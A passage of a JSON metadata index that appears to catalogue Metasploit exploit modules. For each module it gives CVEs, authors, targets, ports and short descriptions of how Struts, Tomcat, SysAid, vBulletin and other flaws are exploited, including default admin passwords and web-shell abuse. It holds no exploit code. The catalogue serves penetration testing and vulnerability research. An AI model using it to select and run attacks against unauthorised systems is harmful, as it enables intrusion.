"is_install_path": true,
"ref_name": "multi/http/struts_code_exec_parameters",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_default_action_mapper": {
"name": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution",
"full_name": "exploit/multi/http/struts_default_action_mapper",
"rank": 600,
"disclosure_date": "2013-07-02",
"type": "exploit",
"author": [
"Takeshi Terada",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\n a desired navigational target expression. This mechanism was intended to help with\n attaching navigational information to buttons within forms.\n\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\n \"redirectAction:\" is not properly sanitized. Since said information will be\n evaluated as OGNL expression against the value stack, this introduces the\n possibility to inject server side code.",
"references": [
"CVE-2013-2251",
"OSVDB-95405",
"BID-61189",
"URL-http://struts.apache.org/release/2.3.x/docs/s2-016.html"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_default_action_mapper.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_default_action_mapper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_dev_mode": {
"name": "Apache Struts 2 Developer Mode OGNL Execution",
"full_name": "exploit/multi/http/struts_dev_mode",
"rank": 600,
"disclosure_date": "2012-01-06",
"type": "exploit",
"author": [
"Johannes Dahse",
"Andreas Nusser",
"Alvaro",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote command execution vulnerability in Apache\n Struts 2. The problem exists on applications running in developer mode,\n where the DebuggingInterceptor allows evaluation and execution of OGNL\n expressions, which allows remote attackers to execute arbitrary Java\n code. This module has been tested successfully on Struts 2.3.16, Tomcat\n 7 and Ubuntu 10.04.",
"references": [
"CVE-2012-0394",
"OSVDB-78276",
"EDB-18329",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Struts 2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_dev_mode.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_dev_mode",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_dmi_exec": {
"name": "Apache Struts Dynamic Method Invocation Remote Code Execution",
"full_name": "exploit/multi/http/struts_dmi_exec",
"rank": 600,
"disclosure_date": "2016-04-27",
"type": "exploit",
"author": [
"Nixawk",
"rungobier"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts\n version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code\n Execution can be performed via method: prefix when Dynamic Method Invocation\n is enabled.",
"references": [
"CVE-2016-3081",
"URL-https://www.seebug.org/vuldb/ssvid-91389"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_dmi_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_dmi_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_dmi_rest_exec": {
"name": "Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution",
"full_name": "exploit/multi/http/struts_dmi_rest_exec",
"rank": 600,
"disclosure_date": "2016-06-01",
"type": "exploit",
"author": [
"Nixawk"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts\n version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code\n Execution can be performed when using REST Plugin with ! operator when\n Dynamic Method Invocation is enabled.",
"references": [
"CVE-2016-3087",
"URL-https://www.seebug.org/vuldb/ssvid-91741"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_dmi_rest_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_dmi_rest_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_include_params": {
"name": "Apache Struts includeParams Remote Code Execution",
"full_name": "exploit/multi/http/struts_include_params",
"rank": 500,
"disclosure_date": "2013-05-24",
"type": "exploit",
"author": [
"Eric Kobrin",
"Douglas Rodrigues",
"Richard Hicks <scriptmonkey.blog@gmail.com>"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts\n versions < 2.3.14.2. A specifically crafted request parameter can be used to inject\n arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.\n When targeting an action which requires interaction through GET, the payload should\n be split, taking into account the URI limits. In this case, if the rendered JSP has\n more than one point of injection, it could result in payload corruption. This should\n happen only when the payload is larger than the URI length.",
"references": [
"CVE-2013-2115",
"CVE-2013-1966",
"OSVDB-93645",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-014",
"URL-http://struts.apache.org/development/2.x/docs/s2-013.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal",
"Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_include_params.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_include_params",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/stunshell_eval": {
"name": "STUNSHELL Web Shell Remote PHP Code Execution",
"full_name": "exploit/multi/http/stunshell_eval",
"rank": 500,
"disclosure_date": "2013-03-23",
"type": "exploit",
"author": [
"bwall <bwall@openbwall.com>"
],
"description": "This module exploits unauthenticated versions of the \"STUNSHELL\" web shell.\n This module works when safe mode is enabled on the web server. This shell is widely\n used in automated RFI payloads.",
"references": [
"OSVDB-91842",
"URL-https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL",
"URL-https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"stunshell"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/stunshell_eval.rb",
"is_install_path": true,
"ref_name": "multi/http/stunshell_eval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/stunshell_exec": {
"name": "STUNSHELL Web Shell Remote Code Execution",
"full_name": "exploit/multi/http/stunshell_exec",
"rank": 500,
"disclosure_date": "2013-03-23",
"type": "exploit",
"author": [
"bwall <bwall@openbwall.com>"
],
"description": "This module exploits unauthenticated versions of the \"STUNSHELL\" web shell.\n This module works when safe mode is disabled on the web server. This shell is\n widely used in automated RFI payloads.",
"references": [
"OSVDB-91842",
"URL-https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL",
"URL-https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"stunshell / Unix",
"stunshell / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/stunshell_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/stunshell_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sun_jsws_dav_options": {
"name": "Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",
"full_name": "exploit/multi/http/sun_jsws_dav_options",
"rank": 500,
"disclosure_date": "2010-01-20",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Sun Java Web Server prior to\n version 7 Update 8. By sending an \"OPTIONS\" request with an overly long\n path, attackers can execute arbitrary code. In order to reach the vulnerable\n code, the attacker must also specify the path to a directory with WebDAV\n enabled.\n\n This exploit was tested and confirmed to work on Windows XP SP3 without DEP.\n Versions for other platforms are vulnerable as well.\n\n The vulnerability was originally discovered and disclosed by Evgeny Legerov of\n Intevydis.",
"references": [
"CVE-2010-0361",
"OSVDB-61851"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Sun Java System Web Server 7.0 update 7 on Windows x86 (SEH)",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/sun_jsws_dav_options.rb",
"is_install_path": true,
"ref_name": "multi/http/sun_jsws_dav_options",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sysaid_auth_file_upload": {
"name": "SysAid Help Desk Administrator Portal Arbitrary File Upload",
"full_name": "exploit/multi/http/sysaid_auth_file_upload",
"rank": 600,
"disclosure_date": "2015-06-03",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in SysAid Help Desk.\n The vulnerability exists in the ChangePhoto.jsp in the administrator portal,\n which does not correctly handle directory traversal sequences and does not\n enforce file extension restrictions. While an attacker needs an administrator\n account in order to leverage this vulnerability, there is a related Metasploit\n auxiliary module which can create this account under some circumstances.\n This module has been tested in SysAid v14.4 in both Linux and Windows.",
"references": [
"CVE-2015-2994",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"SysAid Help Desk v14.4 / Linux",
"SysAid Help Desk v14.4 / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/sysaid_auth_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/sysaid_auth_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sysaid_rdslogs_file_upload": {
"name": "SysAid Help Desk 'rdslogs' Arbitrary File Upload",
"full_name": "exploit/multi/http/sysaid_rdslogs_file_upload",
"rank": 600,
"disclosure_date": "2015-06-03",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.\n The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated\n file uploads and handles zip file contents in an insecure way. By combining both weaknesses,\n a remote attacker can accomplish remote code execution. Note that this will only work if the\n target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection\n against null byte injection in file names. This module has been tested successfully on version\n v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid\n seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability\n from being exploited.",
"references": [
"CVE-2015-2995",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SysAid Help Desk v14.3 - 14.4 / Java Universal"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/sysaid_rdslogs_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/testlink_upload_exec": {
"name": "TestLink v1.9.3 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/testlink_upload_exec",
"rank": 600,
"disclosure_date": "2012-08-13",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in TestLink version 1.9.3 or prior.\n This application has an upload feature that allows any authenticated\n user to upload arbitrary files to the '/upload_area/nodes_hierarchy/'\n directory with a randomized file name. The file name can be retrieved from\n the database using SQL injection.",
"references": [
"CVE-2012-0938",
"OSVDB-85446",
"EDB-20500",
"URL-http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/testlink_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/testlink_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/tomcat_jsp_upload_bypass": {
"name": "Tomcat RCE via JSP Upload Bypass",
"full_name": "exploit/multi/http/tomcat_jsp_upload_bypass",
"rank": 600,
"disclosure_date": "2017-10-03",
"type": "exploit",
"author": [
"peewpw"
],
"description": "This module uploads a jsp payload and executes it.",
"references": [
"CVE-2017-12617",
"URL-http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617",
"URL-https://bz.apache.org/bugzilla/show_bug.cgi?id=61542"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Java Windows",
"Java Linux"
],
"mod_time": "2017-10-11 15:53:35 +0000",
"path": "/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb",
"is_install_path": true,
"ref_name": "multi/http/tomcat_jsp_upload_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/tomcat_mgr_deploy": {
"name": "Apache Tomcat Manager Application Deployer Authenticated Code Execution",
"full_name": "exploit/multi/http/tomcat_mgr_deploy",
"rank": 600,
"disclosure_date": "2009-11-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module can be used to execute a payload on Apache Tomcat servers that\n have an exposed \"manager\" application. The payload is uploaded as a WAR archive\n containing a jsp application using a PUT request.\n\n The manager application can also be abused using /manager/html/upload, but that\n method is not implemented in this module.\n\n NOTE: The compatible payload sets vary based on the selected target. For\n example, you must select the Windows target to use native Windows payloads.",
"references": [
"CVE-2009-3843",
"OSVDB-60317",
"CVE-2009-4189",
"OSVDB-60670",
"CVE-2009-4188",
"BID-38084",
"CVE-2010-0557",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179",
"CVE-2010-4094",
"ZDI-10-214",
"CVE-2009-3548",
"OSVDB-60176",
"BID-36954",
"URL-http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Java Universal",
"Windows Universal",
"Linux x86"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/http/tomcat_mgr_deploy.rb",
"is_install_path": true,
"ref_name": "multi/http/tomcat_mgr_deploy",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/tomcat_mgr_upload": {
"name": "Apache Tomcat Manager Authenticated Upload Code Execution",
"full_name": "exploit/multi/http/tomcat_mgr_upload",
"rank": 600,
"disclosure_date": "2009-11-09",
"type": "exploit",
"author": [
"rangercha"
],
"description": "This module can be used to execute a payload on Apache Tomcat servers that\n have an exposed \"manager\" application. The payload is uploaded as a WAR archive\n containing a jsp application using a POST request against the /manager/html/upload\n component.\n\n NOTE: The compatible payload sets vary based on the selected target. For\n example, you must select the Windows target to use native Windows payloads.",
"references": [
"CVE-2009-3843",
"OSVDB-60317",
"CVE-2009-4189",
"OSVDB-60670",
"CVE-2009-4188",
"BID-38084",
"CVE-2010-0557",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179",
"CVE-2010-4094",
"ZDI-10-214",
"CVE-2009-3548",
"OSVDB-60176",
"BID-36954",
"URL-http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal",
"Windows Universal",
"Linux x86"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/http/tomcat_mgr_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/tomcat_mgr_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/traq_plugin_exec": {
"name": "Traq admincp/common.php Remote Code Execution",
"full_name": "exploit/multi/http/traq_plugin_exec",
"rank": 600,
"disclosure_date": "2011-12-12",
"type": "exploit",
"author": [
"EgiX",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n Traq 2.0 to 2.3. It's in the admincp/common.php script.\n\n This function is called in each script located in the /admicp/ directory to\n make sure the user has admin rights. This is a broken authorization schema\n because the header() function doesn't stop the execution flow.\n This can be exploited by malicious users to execute admin functionality,\n e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.",
"references": [
"OSVDB-77556",
"EDB-18213",
"URL-http://traqproject.org/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/traq_plugin_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/traq_plugin_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi": {
"name": "Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution",
"full_name": "exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi",
"rank": 600,
"disclosure_date": "2017-04-10",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"Roberto Suggi Liverani <Roberto Suggi Liverani @malerisch>"
],
"description": "This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi\n interface (CVE-2016-7547).\n\n Note: You have the option to use the authentication bypass or not since it requires\n that the server is rebooted. The password reset will render the authentication useless.\n Typically, if an administrator cant login, they will bounce the box. Therefore, this\n module performs a heartbeat request until the box is bounced and then attempts to login\n and to perform the command injection. This module has been tested on version 2.6.1062r1\n of the appliance.",
"references": [
"URL-https://asciinema.org/a/112480",
"CVE-2016-7552",
"CVE-2016-7547"
],
"platform": "Linux",
"arch": "x86",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Trend Micro Threat Discovery Appliance 2.6.1062r1"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb",
"is_install_path": true,
"ref_name": "multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/uptime_file_upload_1": {
"name": "Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",
"full_name": "exploit/multi/http/uptime_file_upload_1",
"rank": 600,
"disclosure_date": "2013-11-19",
"type": "exploit",
"author": [
"Denis Andzakovic <denis.andzakovic@security-assessment.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability found within the Up.Time\n monitoring server 7.2 and below. A malicious entity can upload a PHP file into the\n webroot without authentication, leading to arbitrary code execution.\n\n Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly\n mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use\n exploits/multi/http/uptime_file_upload_2.",
"references": [
"OSVDB-100423",
"BID-64031",
"URL-http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf"
],
"platform": "PHP",
"arch": "php",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Up.Time 7.0/7.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/uptime_file_upload_1.rb",
"is_install_path": true,
"ref_name": "multi/http/uptime_file_upload_1",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/uptime_file_upload_2": {
"name": "Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",
"full_name": "exploit/multi/http/uptime_file_upload_2",
"rank": 600,
"disclosure_date": "2013-11-18",
"type": "exploit",
"author": [
"Denis Andzakovic",
"Ewerson Guimaraes(Crash) <crash@dclabs.com.br>",
"Gjoko Krstic(LiquidWorm) <gjoko@zeroscience.mk>"
],
"description": "This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.\n\n The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,\n which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated\n by the vendor.\n\n Although the mitigation in place will prevent uptime_file_upload_1.rb from working, it\n can still be bypassed and gain privilege escalation, and allows the attacker to upload file\n again, and execute arbitrary commands.",
"references": [
"EDB-37888",
"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php"
],
"platform": "PHP",
"arch": "php",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/uptime_file_upload_2.rb",
"is_install_path": true,
"ref_name": "multi/http/uptime_file_upload_2",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/v0pcr3w_exec": {
"name": "v0pCr3w Web Shell Remote Code Execution",
"full_name": "exploit/multi/http/v0pcr3w_exec",
"rank": 500,
"disclosure_date": "2013-03-23",
"type": "exploit",
"author": [
"bwall <bwall@openbwall.com>"
],
"description": "This module exploits a lack of authentication in the shell developed by v0pCr3w\n and is widely reused in automated RFI payloads. This module takes advantage of the\n shell's various methods to execute commands.",
"references": [
"OSVDB-91841",
"URL-https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell",
"URL-https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"v0pCr3w / Unix",
"v0pCr3w / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/v0pcr3w_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/v0pcr3w_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/vbseo_proc_deutf": {
"name": "vBSEO proc_deutf() Remote PHP Code Injection",
"full_name": "exploit/multi/http/vbseo_proc_deutf",
"rank": 600,
"disclosure_date": "2012-01-23",
"type": "exploit",
"author": [
"EgiX <n0b0d13s@gmail.com>"
],
"description": "This module exploits a vulnerability in the 'proc_deutf()' function\n defined in /includes/functions_vbseocp_abstract.php for vBSEO versions\n 3.6.0 and earlier. User input passed through 'char_repl' POST parameter\n isn't properly sanitized before being used in a call to preg_replace()\n function which uses the 'e' modifier. This can be exploited to inject\n and execute arbitrary code leveraging the PHP's complex curly syntax.",
"references": [
"CVE-2012-5223",
"OSVDB-78508",
"BID-51647",
"EDB-18424"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/multi/http/vbseo_proc_deutf.rb",
"is_install_path": true,
"ref_name": "multi/http/vbseo_proc_deutf",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/vbulletin_unserialize": {
"name": "vBulletin 5.1.2 Unserialize Code Execution",
"full_name": "exploit/multi/http/vbulletin_unserialize",
"rank": 600,
"disclosure_date": "2015-11-04",
"type": "exploit",
"author": [
"Netanel Rubin",
"cutz",
"Julien (jvoisin) Voisin"
],
"description": "This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9",
"references": [
"CVE-2015-7808",
"EDB-38629",
"URL-http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq",
"URL-http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"vBulletin 5.0.X",
"vBulletin 5.1.X"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/vbulletin_unserialize.rb",
"is_install_path": true,
"ref_name": "multi/http/vbulletin_unserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/visual_mining_netcharts_upload": {
"name": "Visual Mining NetCharts Server Remote Code Execution",
"full_name": "exploit/multi/http/visual_mining_netcharts_upload",
"rank": 600,
"disclosure_date": "2014-11-03",
"type": "exploit",
"author": [
"sghctoma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits multiple vulnerabilities in Visual Mining NetCharts.\n First, a lack of input validation in the administration console permits\n arbitrary jsp code upload to locations accessible later through the web\n service. Authentication is typically required, however a 'hidden' user is\n available by default (and non-editable). This user, named 'Scheduler',\n can only login to the console after any modification in the user\n database (a user is added, admin password is changed etc). If the\n 'Scheduler' user isn't available valid credentials must be supplied. The\n default Admin password is Admin.",
"references": [
"CVE-2014-8516",
"ZDI-14-372"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 8001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Visual Mining NetCharts Server 7.0"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/http/visual_mining_netcharts_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/visual_mining_netcharts_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/vtiger_install_rce": {
"name": "Vtiger Install Unauthenticated Remote Command Execution",
"full_name": "exploit/multi/http/vtiger_install_rce",
"rank": 0,
"disclosure_date": "2014-03-05",
"type": "exploit",
"author": [
"Jonathan Borgeaud < research@navixia.com >"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Vtiger install script. This module is set to ManualRanking due to this\n module overwriting the target database configuration, which may result in\n a broken web app, and you may not be able to get a session again.",
"references": [
"CVE-2014-2268",
"URL-https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html",
"URL-http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Vtiger 6.0.0 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/vtiger_install_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/vtiger_install_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/vtiger_logo_upload_exec": {
"name": "Vtiger CRM - Authenticated Logo Upload RCE",
"full_name": "exploit/multi/http/vtiger_logo_upload_exec",
"rank": 600,
"disclosure_date": "2015-09-28",
"type": "exploit",
"author": [
"Benjamin Daniel Mussler",
